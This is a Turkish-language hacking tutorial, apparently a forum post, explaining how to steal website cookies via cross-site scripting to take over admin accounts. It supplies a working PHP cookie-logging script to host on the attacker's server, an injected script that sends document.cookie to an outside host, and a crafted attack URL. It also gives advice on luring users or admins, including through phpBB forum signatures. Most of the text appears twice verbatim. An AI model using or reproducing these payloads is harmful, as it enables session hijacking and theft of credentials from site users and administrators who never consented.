Öncelikle Cookie nedir ne işe yarar kısa bir açıklama ile konuya girmek istiyorum. Cookie nette gezinirken kullandığınız web sitelerinin sizi tanımasını sağlayan .txt uzantılı web kimliğinizdir. Bir çok mail girişinde veyahut forum girişlerinde "Beni Hatırla" seçeneğini görmüşsünüzdür mutlaka. Bu gibi işlemler kullandığınız tarayıcılar ("IE, Mozilla" gibi) bilgisayarınıza kaydederek aynı siteye birdahaki girişlerinize sizi otomatik olarak tanımanıza yardımcı olur. Bu dosyalar aynı zamanda bir forumda user mı yoksa admin olduğumuzu da tanımlayan dosyalardır.
Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.
COOKIE'Yi Nasıl Çalarız..
Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.
En basitinden **********javascript:alert(********.cookie);</script> java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.
Örnek:
Basit yazılmış bir script ile cookie'nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde frame içinde yutturmanızda mümkün.
Kod:
<?php $filename = getcwd()."\\loglarburaya.txt"; if(!file_exists($filename)){ touch($filename); chmod($filename, 0666); } if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Hata: Loglar dosyaya kaydedilemedi!"; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Hata: Loglar dosyaya kaydedilemedi!"; exit; } } echo "Log başarıyla girildi..."; fclose($handle); exit; } echo "Hani loglayacağımız parametre?"; exit;?>
Yukarıda php diliyle yazılmış bir script görüyorsunuz. Bu script cookie'yi loglamaya yarayacak.Bu kodu öncelikle farklı kaydet deyip .php uzantılı olarak kaydediyoruz. Kendinize ait bir hosta atıyorsunuz.
Açıklamalar:
loglarburaya.txt: Yeni bir .txt belgesi oluşturarak logları buraya yazın. Cookie'nin yazılabilmesi için mutlaka CHMOD'unun 777 yani yazma izinli olması gerekiyor.
Cookie'yi çalma kodu:
Kod:
**********window.navigate("http://siteniz.com/cookie.php?cookie="+********.cookie)</script>
Şimdi hacklemek istediğimiz sitedeki açıkları denemeye geliyoruz.
Örneğin elimizde www.xxx.com/oyun.asp?id
Biz bunu önceki verdiğim örnek kodla deniyoruz;
www.xxx.com/oyun.asp?id=**********javascript:alert(documen t.cookie);</script>
Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.
Baktık açığımız var. Burdan bir şekilde frame ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.
Kod:
http://www.xxx.com/oyun.asp?id=**********window.navigate("http://siteniz.com/cookie.php?cookie="+********.cookie)</script>
Kullanıcı ya da admin bu adrese girdiğinde cookileri size gelecektir. Bu yöntemi forumlarda kullanabilirsiniz. Phpbb 2.0.16 Xss açığı ile imzaya eklediğiniz kod ile konunuza bakan tm kullanıcların cookieleri siz gelecektir. XSS geleceğin en tehlikeli açıklarından bunu söylemek yanlış olmaz çünkü bu açık sayesinde kafanıza kullanarak mail, wap serverlerına girmeniz bile mümkün gerisi sizin hayal gücünüze kalmış…
Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.
COOKIE'Yi Nasıl Çalarız..
Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.
En basitinden **********javascript:alert(********.cookie);</script> java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.
Örnek:
Basit yazılmış bir script ile cookie'nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde frame içinde yutturmanızda mümkün.
Kod:
<?php $filename = getcwd()."\\loglarburaya.txt"; if(!file_exists($filename)){ touch($filename); chmod($filename, 0666); } if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Hata: Loglar dosyaya kaydedilemedi!"; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Hata: Loglar dosyaya kaydedilemedi!"; exit; } } echo "Log başarıyla girildi..."; fclose($handle); exit; } echo "Hani loglayacağımız parametre?"; exit;?>
Yukarıda php diliyle yazılmış bir script görüyorsunuz. Bu script cookie'yi loglamaya yarayacak.Bu kodu öncelikle farklı kaydet deyip .php uzantılı olarak kaydediyoruz. Kendinize ait bir hosta atıyorsunuz.
Açıklamalar:
loglarburaya.txt: Yeni bir .txt belgesi oluşturarak logları buraya yazın. Cookie'nin yazılabilmesi için mutlaka CHMOD'unun 777 yani yazma izinli olması gerekiyor.
Cookie'yi çalma kodu:
Kod:
**********window.navigate("http://siteniz.com/cookie.php?cookie="+********.cookie)</script>
Şimdi hacklemek istediğimiz sitedeki açıkları denemeye geliyoruz.
Örneğin elimizde www.xxx.com/oyun.asp?id
Biz bunu önceki verdiğim örnek kodla deniyoruz;
www.xxx.com/oyun.asp?id=**********javascript:alert(documen t.cookie);</script>
Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.
Baktık açığımız var. Burdan bir şekilde frame ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.
Kod:
http://www.xxx.com/oyun.asp?id=**********window.navigate("http://siteniz.com/cookie.php?cookie="+********.cookie)</script>
Kullanıcı ya da admin bu adrese girdiğinde cookileri size gelecektir. Bu yöntemi forumlarda kullanabilirsiniz. Phpbb 2.0.16 Xss açığı ile imzaya eklediğiniz kod ile konunuza bakan tm kullanıcların cookieleri siz gelecektir. XSS geleceğin en tehlikeli açıklarından bunu söylemek yanlış olmaz çünkü bu açık sayesinde kafanıza kullanarak mail, wap serverlerına girmeniz bile mümkün gerisi sizin hayal gücünüze kalmış…
